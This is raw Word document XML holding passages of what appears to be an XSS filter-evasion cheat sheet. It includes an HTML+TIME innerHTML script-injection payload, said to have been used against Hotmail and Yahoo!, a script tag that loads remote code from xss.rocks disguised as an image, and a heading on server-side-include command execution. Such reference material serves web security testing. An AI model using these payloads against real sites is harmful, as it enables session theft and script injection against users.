          <w:spacing w:val="-37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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.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2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="124"/>
      </w:pPr>
      <w:r>
        <w:t>HTML+TIME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XML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19" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>This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how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Grey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Magic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hotmail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Yahoo!.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works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Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Explorer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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode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remember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need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between</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML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BODY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tags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work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="319" w:lineRule="auto"/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ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5524500" cy="763905"/>
                <wp:effectExtent l="5715" t="3175" r="3810" b="4445"/>
                <wp:docPr id="659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763905"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8700" cy="1203"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="660" name="Freeform 6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00" cy="1203"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8678 w 8700"/>
                              <a:gd name="T1" fmla="*/ 1203 h 1203"/>
                              <a:gd name="T2" fmla="*/ 21 w 8700"/>
                              <a:gd name="T3" fmla="*/ 1203 h 1203"/>
                              <a:gd name="T4" fmla="*/ 18 w 8700"/>
                              <a:gd name="T5" fmla="*/ 1202 h 1203"/>
                              <a:gd name="T6" fmla="*/ 0 w 8700"/>
                              <a:gd name="T7" fmla="*/ 1182 h 1203"/>
                              <a:gd name="T8" fmla="*/ 0 w 8700"/>
                              <a:gd name="T9" fmla="*/ 1179 h 1203"/>
                              <a:gd name="T10" fmla="*/ 0 w 8700"/>
                              <a:gd name="T11" fmla="*/ 21 h 1203"/>
                              <a:gd name="T12" fmla="*/ 21 w 8700"/>
                              <a:gd name="T13" fmla="*/ 0 h 1203"/>
                              <a:gd name="T14" fmla="*/ 8678 w 8700"/>
                              <a:gd name="T15" fmla="*/ 0 h 1203"/>
                              <a:gd name="T16" fmla="*/ 8699 w 8700"/>
                              <a:gd name="T17" fmla="*/ 21 h 1203"/>
                              <a:gd name="T18" fmla="*/ 8699 w 8700"/>
                              <a:gd name="T19" fmla="*/ 1182 h 1203"/>
                              <a:gd name="T20" fmla="*/ 8681 w 8700"/>
                              <a:gd name="T21" fmla="*/ 1202 h 1203"/>
                              <a:gd name="T22" fmla="*/ 8678 w 8700"/>
                              <a:gd name="T23" fmla="*/ 1203 h 1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700" h="1203">
                                <a:moveTo>
                                  <a:pt x="8678" y="1203"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="1203"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="1202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1179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8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8699" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8699" y="1182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8681" y="1202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8678" y="1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Text Box 66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700" cy="1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&lt;HTML&gt;&lt;BODY&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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&lt;?xml:namespace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prefix="t"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ns="urn:schemas-microsoft-com:time"&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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&lt;?import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namespace="t"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implementation="#default#time2"&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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&lt;t:set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attributeName="innerHTML"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to="XSS&lt;SCRIPT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DEFER&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="56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&lt;/BODY&gt;&lt;/HTML&gt;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60" o:spid="_x0000_s1770" style="width:435pt;height:60.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8700,1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">
                <v:shape id="Freeform 662" o:spid="_x0000_s1771" style="position:absolute;width:8700;height:1203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,12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WXCMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhO8jJnqoEg1yhQET9KpB49vzTMp&#10;a15qE7X+9+Yw2PHj+71Y9a4Rd+pC7VnBZJyBIK68rtkoOB23HzMQISJrbDyTgicFWC0HbwsstH/w&#10;N90P0YgUwqFABTbGtpAyVJYchrFviRN38Z3DmGBnpO7wkcJdI6dZlkuHNacGiy1tLFW/h5tT8FmW&#10;p6uuy9Buf97tdH09743ZKTUa9l9zEJH6+C/+c++0gjxP89OZd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FlwjBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m8678,1203r-8657,l18,1202,,1182r,-3l,21,21,,8678,r21,21l8699,1182r-18,20l8678,1203xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8678,1203;21,1203;18,1202;0,1182;0,1179;0,21;21,0;8678,0;8699,21;8699,1182;8681,1202;8678,1203" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 661" o:spid="_x0000_s1772" type="#_x0000_t202" style="position:absolute;width:8700;height:1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fcscQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IK3upGD8GmriJFQRDEmB56fM0+&#10;k8Xs25hdNf57VxB6HGbmG2a26G0jrtR541jBeJSAIC6dNlwp+CnWH1MQPiBrbByTgjt5WMwHbzPM&#10;tLtxTtdDqESEsM9QQR1Cm0npy5os+pFriaN3dJ3FEGVXSd3hLcJtIydJkkqLhuNCjS1911SeDher&#10;YPnL+cqcd3/7/JibovhMeJuelBq+98svEIH68B9+tTdaQZqO4X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n3LHEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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&lt;HTML&gt;&lt;BODY&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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&lt;?xml:namespace</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="71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prefix="t"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="71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ns="urn:schemas-microsoft-com:time"&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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&lt;?import</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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namespace="t"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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implementation="#default#time2"&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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&lt;t:set</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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attributeName="innerHTML"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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to="XSS&lt;SCRIPT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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DEFER&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="56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&lt;/BODY&gt;&lt;/HTML&gt;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4"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2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63296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4782185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>69850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="254635" cy="146685"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="656" name="Group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635" cy="146685"/>
                          <a:chOff x="7531" y="110"/>
                          <a:chExt cx="401" cy="231"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="657" name="Freeform 659"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7531" y="109"/>
                            <a:ext cx="401" cy="231"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7911 7531"/>
                              <a:gd name="T1" fmla="*/ T0 w 401"/>
                              <a:gd name="T2" fmla="+- 0 341 110"/>
                              <a:gd name="T3" fmla="*/ 341 h 231"/>
                              <a:gd name="T4" fmla="+- 0 7553 7531"/>
                              <a:gd name="T5" fmla="*/ T4 w 401"/>
                              <a:gd name="T6" fmla="+- 0 341 110"/>
                              <a:gd name="T7" fmla="*/ 341 h 231"/>
                              <a:gd name="T8" fmla="+- 0 7549 7531"/>
                              <a:gd name="T9" fmla="*/ T8 w 401"/>
                              <a:gd name="T10" fmla="+- 0 340 110"/>
                              <a:gd name="T11" fmla="*/ 340 h 231"/>
                              <a:gd name="T12" fmla="+- 0 7531 7531"/>
                              <a:gd name="T13" fmla="*/ T12 w 401"/>
                              <a:gd name="T14" fmla="+- 0 320 110"/>
                              <a:gd name="T15" fmla="*/ 320 h 231"/>
                              <a:gd name="T16" fmla="+- 0 7531 7531"/>
                              <a:gd name="T17" fmla="*/ T16 w 401"/>
                              <a:gd name="T18" fmla="+- 0 316 110"/>
                              <a:gd name="T19" fmla="*/ 316 h 231"/>
                              <a:gd name="T20" fmla="+- 0 7531 7531"/>
                              <a:gd name="T21" fmla="*/ T20 w 401"/>
                              <a:gd name="T22" fmla="+- 0 131 110"/>
                              <a:gd name="T23" fmla="*/ 131 h 231"/>
                              <a:gd name="T24" fmla="+- 0 7553 7531"/>
                              <a:gd name="T25" fmla="*/ T24 w 401"/>
                              <a:gd name="T26" fmla="+- 0 110 110"/>
                              <a:gd name="T27" fmla="*/ 110 h 231"/>
                              <a:gd name="T28" fmla="+- 0 7911 7531"/>
                              <a:gd name="T29" fmla="*/ T28 w 401"/>
                              <a:gd name="T30" fmla="+- 0 110 110"/>
                              <a:gd name="T31" fmla="*/ 110 h 231"/>
                              <a:gd name="T32" fmla="+- 0 7932 7531"/>
                              <a:gd name="T33" fmla="*/ T32 w 401"/>
                              <a:gd name="T34" fmla="+- 0 131 110"/>
                              <a:gd name="T35" fmla="*/ 131 h 231"/>
                              <a:gd name="T36" fmla="+- 0 7932 7531"/>
                              <a:gd name="T37" fmla="*/ T36 w 401"/>
                              <a:gd name="T38" fmla="+- 0 320 110"/>
                              <a:gd name="T39" fmla="*/ 320 h 231"/>
                              <a:gd name="T40" fmla="+- 0 7914 7531"/>
                              <a:gd name="T41" fmla="*/ T40 w 401"/>
                              <a:gd name="T42" fmla="+- 0 340 110"/>
                              <a:gd name="T43" fmla="*/ 340 h 231"/>
                              <a:gd name="T44" fmla="+- 0 7911 7531"/>
                              <a:gd name="T45" fmla="*/ T44 w 401"/>
                              <a:gd name="T46" fmla="+- 0 341 110"/>
                              <a:gd name="T47" fmla="*/ 341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01" h="231">
                                <a:moveTo>
                                  <a:pt x="380" y="231"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22" y="231"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="206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lnTo>
                                  <a:pt x="380" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="383" y="230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="380" y="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Text Box 658"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7531" y="109"/>
                            <a:ext cx="40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56"/>
                                <w:ind w:left="45"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="16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110"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>.js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7" o:spid="_x0000_s1773" style="position:absolute;left:0;text-align:left;margin-left:376.55pt;margin-top:5.5pt;width:20.05pt;height:11.55pt;z-index:15863296;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7531,110" coordsize="401,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">
                <v:shape id="Freeform 659" o:spid="_x0000_s1774" style="position:absolute;left:7531;top:109;width:401;height:231;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="401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10KMcA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VTQatpVhFBTA+FVgVzfGRf&#10;k9Ds25hdk9hf3y0Uehxm5hsm2QymFh21rrKs4GkagSDOra64UHA+7R+XIJxH1lhbJgV3crBZjx4S&#10;jLXt+YO6oy9EgLCLUUHpfRNL6fKSDLqpbYiD92lbgz7ItpC6xT7ATS1nUbSQBisOCyU2tCsp/zre&#10;jIITv66umT7sllnaXe5V2n9f3t6VmoyH7QsIT4P/D/+1U61gMX+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NdCjHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m380,231r-358,l18,230,,210r,-4l,21,22,,380,r21,21l401,210r-18,20l380,231xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="380,341;22,341;18,340;0,320;0,316;0,131;22,110;380,110;401,131;401,320;383,340;380,341" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 658" o:spid="_x0000_s1775" type="#_x0000_t202" style="position:absolute;left:7531;top:109;width:401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G/kc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pC+xb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sb+R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56"/>
                          <w:ind w:left="45"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="16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110"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>.js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Assuming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few</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters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filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
      </w:pP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rename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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image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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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1942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2615565" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="653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5565" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="4119" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="654" name="Freeform 656"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="4119" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5712 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4119"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4119"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4119"/>
                              <a:gd name="T10" fmla="+- 0 421 240"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4119"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4119"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4119"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4119"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5712 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4119"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5733 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4119"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5733 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4119"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5715 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4119"/>
                              <a:gd name="T42" fmla="+- 0 421 240"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5712 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4119"/>
                              <a:gd name="T46" fmla="+- 0 422 240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19" h="183">
                                <a:moveTo>
                                  <a:pt x="409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098" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4101" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="409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Text Box 655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39"/>
                            <a:ext cx="411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9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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId44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http://xss.rocks/xss.jpg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4" o:spid="_x0000_s1776" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:205.95pt;height:9.15pt;z-index:-15597056;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="411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">
                <v:shape id="Freeform 656" o:spid="_x0000_s1777" style="position:absolute;left:1614;top:239;width:4119;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="411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+8kcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNWN0aqNbkJpEXvxYPRgb4/s&#10;Mwlm34bdrab/visUehxm5htmXQymE1dyvrWsYDJOQBBXVrdcKzgeNs9LED4ga+wsk4If8lDkjw9r&#10;zLS98Z6uZahFhLDPUEETQp9J6auGDPqx7Ymjd7bOYIjS1VI7vEW46WSaJHNpsOW40GBP7w1Vl/Lb&#10;KPBf+0Wa+ulryaeFQ9se9Hb3odToaXhbgQg0hP/wX/tTK5i/zOB+Jh4B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f7yRxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4098,182l21,182r-3,-1l,161r,-3l,21,21,,4098,r21,21l4119,161r-18,20l4098,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4098,422;21,422;18,421;0,401;0,398;0,261;21,240;4098,240;4119,261;4119,401;4101,421;4098,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 655" o:spid="_x0000_s1778" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:411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QD8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el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sBAP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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId45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http://xss.rocks/xss.jpg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"&gt;&lt;/SCRIPT&gt;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SSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Includes)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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="436"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SSI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installed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server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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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probably</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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mention</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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-37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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>commands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doubt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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serious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>issues: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1993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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5022850" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
